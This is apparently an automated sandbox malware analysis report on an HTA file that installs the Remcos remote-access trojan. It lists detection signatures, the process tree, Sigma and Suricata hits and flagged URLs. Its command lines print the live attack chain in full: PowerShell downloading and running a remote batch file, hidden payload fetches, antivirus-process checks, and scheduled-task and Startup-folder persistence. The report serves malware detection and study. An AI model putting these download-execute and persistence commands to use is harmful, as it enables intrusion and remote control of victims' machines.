Windows Analysis Report
c2.hta

Overview

General Information

Sample name: c2.hta
Analysis ID: 1589232
MD5: ad959a16fe9d80c18b39e7b57bf7ca71
SHA1: 16cd44bda6f1ab39811c990b316f2176a28542f0
SHA256: 41b558fa4bdb281c1b7bf0fc73937b4e4f1caa3beccb752f3082cb665680aa40
Tags: hta user-abuse_ch

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Multi AV Scanner detection for dropped file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
AI detected suspicious sample
Drops PE files with a suspicious file extension
Drops large PE files
Found API chain indicative of sandbox detection
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (suppress errors)
Adds / modifies Windows certificates
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • mshta.exe (PID: 7212 cmdline: mshta.exe "C:\Users\user\Desktop\c2.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 7384 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7560 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c2.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • powershell.exe (PID: 7576 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • Acrobat.exe (PID: 7736 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
          • AcroCEF.exe (PID: 8044 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
            • AcroCEF.exe (PID: 1744 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1344,i,14857468376700330533,7466528391267394821,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • powershell.exe (PID: 7836 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 3916 cmdline: powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • msword.exe (PID: 1228 cmdline: msword.exe MD5: 0DE162AA65BC5DAE2145333A0D1F8801)
          • cmd.exe (PID: 416 cmdline: "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 5696 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
            • findstr.exe (PID: 5920 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • tasklist.exe (PID: 2124 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
            • findstr.exe (PID: 2188 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • cmd.exe (PID: 6832 cmdline: cmd /c md 361684 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • extrac32.exe (PID: 7048 cmdline: extrac32 /Y /E Approaches MD5: 9472AAB6390E4F1431BAA912FCFF9707)
            • findstr.exe (PID: 6288 cmdline: findstr /V "Korea" Measurement MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
            • cmd.exe (PID: 348 cmdline: cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • cmd.exe (PID: 3796 cmdline: cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • Propose.com (PID: 3272 cmdline: Propose.com U MD5: 62D09F076E6E0240548C2F837536A46A)
              • cmd.exe (PID: 3340 cmdline: cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • schtasks.exe (PID: 7860 cmdline: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
              • cmd.exe (PID: 8020 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 3916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • choice.exe (PID: 7908 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 7724 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • LinkHub.com (PID: 5236 cmdline: "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y" MD5: 62D09F076E6E0240548C2F837536A46A)
  • wscript.exe (PID: 2588 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • LinkHub.com (PID: 6644 cmdline: "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y" MD5: 62D09F076E6E0240548C2F837536A46A)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
No yara matches

System Summary

Source: File created | Author: Subhash Popuri (@pbssubhash) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7384, TargetFilename: C:\Users\user\AppData\Local\Temp\c2.bat
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3340, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ProcessId: 7860, ProcessName: schtasks.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7212, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", ProcessId: 7384, ProcessName: powershell.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7212, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", ProcessId: 7384, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c2.bat"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7560, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", ProcessId: 7836, ProcessName: powershell.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", ProcessId: 7724, ProcessName: wscript.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7384, TargetFilename: C:\Users\user\AppData\Local\Temp\c2.bat
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7212, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", ProcessId: 7384, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3340, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ProcessId: 7860, ProcessName: schtasks.exe
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7212, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", ProcessId: 7384, ProcessName: powershell.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", ProcessId: 7724, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7212, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow", ProcessId: 7384, ProcessName: powershell.exe

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 8020, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security | Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 416, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 2188, ProcessName: findstr.exe

Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com, ProcessId: 3272, TargetFilename: C:\ProgramData\remcos\logs.dat
Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T22:54:07.743351+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49822 | 193.26.115.39 | 7009 | TCP
2025-01-11T22:54:08.890787+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49830 | 178.237.33.50 | 80 | TCP
2025-01-11T22:52:59.056498+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49732 | 193.26.115.39 | 443 | TCP
2025-01-11T22:53:01.420101+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49734 | 193.26.115.39 | 443 | TCP
2025-01-11T22:53:06.452263+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49737 | 193.26.115.39 | 443 | TCP

AV Detection

Source: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGP | Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/msword.zipurl2=https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROA | Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/mt | Avira URL Cloud: Label: phishing
Source: https://candwfarmsllc.com/c2.bat | Avira URL Cloud: Label: malware
Source: https://myguyapp.com/W2.pdf9 | Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/msw | Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/W2.pdfG | Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/msword.zipqD | Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/W2.pdfsD | Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/W2.pdf | Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/msword.zipur | Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/W2.p | Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/msword.zipbN | Avira URL Cloud: Label: phishing
Source: https://myguyapp.com/W2.pdfUSERDOMAIN=MQAWXUYUSERD | Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | ReversingLabs: Detection: 15%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 97.8% probability
Source: unknown | HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 16_2_004062D5 FindFirstFileW,FindClose,16_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 16_2_00402E18 FindFirstFileW,16_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 16_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00406C9B
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 36_2_0027A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,36_2_0027A087
